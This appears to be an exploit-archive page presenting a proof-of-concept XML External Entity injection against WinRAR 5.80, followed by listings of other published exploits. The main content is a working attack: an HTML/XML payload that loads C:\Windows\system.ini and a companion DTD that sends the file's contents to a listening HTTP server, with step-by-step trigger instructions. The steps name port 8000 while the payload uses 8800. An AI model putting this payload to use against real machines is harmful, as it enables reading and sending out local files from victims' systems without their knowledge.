Menu

Search for hundreds of thousands of exploits

"winrar 5.80 - XML External Entity Injection"

Author

Exploit author

alblalawi

Platform

Exploit platform

xml

Release date

Exploit published date

2019-10-21

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# Exploit Title: winrar 5.80 - XML External Entity Injection
# Exploit Author: albalawi
# Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
# Version: 5.80
# Tested on: Microsoft Windows Version 10.0.18362.418 64bit

# POC

1- python -m SimpleHTTPServer (listens Port 8000)
2- open winrar or any file.rar
3- help
4- help topics
5- Drag the exploit to the window


html file

<htmlL>
<body>
<xml>
<?xml version="1.0"?>
<!DOCTYPE flavios [ 
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8800/start.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
</body>
</html>



==============================
start.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8800?%file;'>">
%all;
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-07-07 "Microsoft Windows mshta.exe 2019 - XML External Entity Injection" remote xml hyp3rlinx
2020-05-05 "BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection" webapps xml "Daniel Martinez Adan"
2020-02-07 "ExpertGPS 6.38 - XML External Entity Injection" webapps xml "Trent Gordon"
2020-01-22 "Citrix XenMobile Server 10.8 - XML External Entity Injection" webapps xml "Jonas Lejon"
2020-01-20 "Easy XML Editor 1.7.8 - XML External Entity Injection" local xml "Javier Olmedo"
2020-01-09 "MSN Password Recovery 1.30 - XML External Entity Injection" local xml ZwX
2019-12-04 "Microsoft Visual Basic 2010 Express - XML External Entity Injection" local xml ZwX
2019-12-03 "Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass" local xml hyp3rlinx
2019-12-02 "Microsoft Excel 2016 1901 - XML External Entity Injection" local xml hyp3rlinx
2019-12-02 "Visual Studio 2008 - XML External Entity Injection" local xml hyp3rlinx
Release Date Title Type Platform Author
2019-10-21 "winrar 5.80 64bit - Denial of Service" dos windows alblalawi
2019-10-21 "winrar 5.80 - XML External Entity Injection" local xml alblalawi 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected